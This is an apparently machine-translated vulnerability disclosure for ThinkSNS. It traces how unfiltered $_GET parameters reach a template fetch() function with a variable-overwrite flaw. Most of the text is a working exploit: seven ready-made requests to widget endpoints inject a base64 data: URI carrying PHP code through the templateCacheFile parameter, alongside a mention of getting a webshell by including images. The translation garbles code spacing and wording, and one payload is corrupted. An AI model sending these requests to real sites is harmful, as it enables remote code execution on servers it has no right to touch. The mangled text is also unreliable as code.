ThinkSNS third play seven front-end GetShell
The vulnerability is found in DenounceWidget. class. php:
\ Addons \ widget \ DenouceWidget. class. php: 23
/*** Report pop-up box * @ return string pop-up page HTML */public function index () {// get relevant data $ var = $ this-> getVar (); $ content = $ this-> renderFile (dirname (_ FILE __). "/index.html", $ var); return $ content ;}
As you can see, the index function is mainly used to obtain parameters through $ this-> getVar (), and then enters $ this-> renderFile (dirname (_ FILE __). "/index.html", $ var) for template rendering and output.
First look at $ this-> getVar ()
\ Addons \ widget \ DenouceWidget. class. php: 56:
/*** Format the template variable * @ return array reported information */public function getVar () {if (empty ($ _ GET ['aid ']) | empty ($ _ GET ['fuid']) | empty ($ _ GET ['type']) {return false ;} foreach ($ _ GET as $ k =>$ v) {$ var [$ k] = t ($ v );} $ var ['uid'] = $ GLOBALS ['ts '] ['mid']; empty ($ var ['app']) & $ var ['app'] = 'public'; $ var ['source'] = model ('source')-> getSourceInfo ($ var ['type'], $ var ['aid '], false, $ var ['app']); return $ var ;}
Use foreach to merge $ _ GET into $ var, and then return the merged array.
Next, go to $ this-> renderFile (dirname (_ FILE _). "/index.html", $ var)
\ Core \ OpenSociax \ Widget. class. php: 73
/*** Render template output for internal render method calling * @ access public * @ param string $ templateFile template file * @ param mixed $ var template variable * @ param string $ charset template Encoding * @ return string */protected function renderFile ($ templateFile = '', $ var = '', $ charset = 'utf-8') {$ var ['ts '] = $ GLOBALS ['ts']; if (! File_exists_case ($ templateFile) {// automatically locates the template file // $ name = substr (get_class ($ this), 0,-6 ); // $ filename = empty ($ templateFile )? $ Name: $ templateFile; // $ templateFile = 'widget/'. $ name.'/'. $ filename. C ('tmpl _ TEMPLATE_SUFFIX'); // if (! File_exists_case ($ templateFile) throw_exception (L ('_ WIDGET_TEMPLATE_NOT_EXIST _'). '['. $ templateFile. ']');} $ template = $ this-> template? $ This-> template: strtolower (C ('tmpl _ ENGINE_TYPE ')? C ('tmpl _ ENGINE_TYPE '): 'php'); $ content = fetch ($ templateFile, $ var, $ charset); return $ content ;}
Directly put the variables in the $ _ GET array into fetch for execution. The variable overwrite vulnerability exists in fetch, so you can get shell.
For more information about the fetch vulnerability, see WooYun: ThinkPHP Remote Code Execution (specific conditions must be met)
Two getshell Methods: include images containing webshell and filter
/index.php?app=widget&mod=Denouce&act=index&aid=1&fuid=1&type=ztz&templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
In the same principle, there are also six punishments:
Other 6:
1.
POST/index. php? App = widget & mod = Comment & act = addcomment & uid = 1
App_name = public & table_name = user & content = test & row_id = 1 & app_detail_summary = 1 & templateCacheFile = data: text/plain; base64, signature % 3D
2.
POST/index. php? App = widget & mod = Department & act = change
TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D
3.
POST/index. php? App = widget & mod = Diy & act = addWidget
TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D
4.
POST/index. php? App = widget & mod = FeedList & act = loadMore
TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D
5.
POST/index. php? App = widget & mod = FeedList & act = loadNew
TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D & maxId = 1
6.
POST/index. php? App = widget & mod = Remark & act = edit
TemplateCacheFile = data: text/plain; base64, PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4 % 3D
Solution:
Enhanced Filtering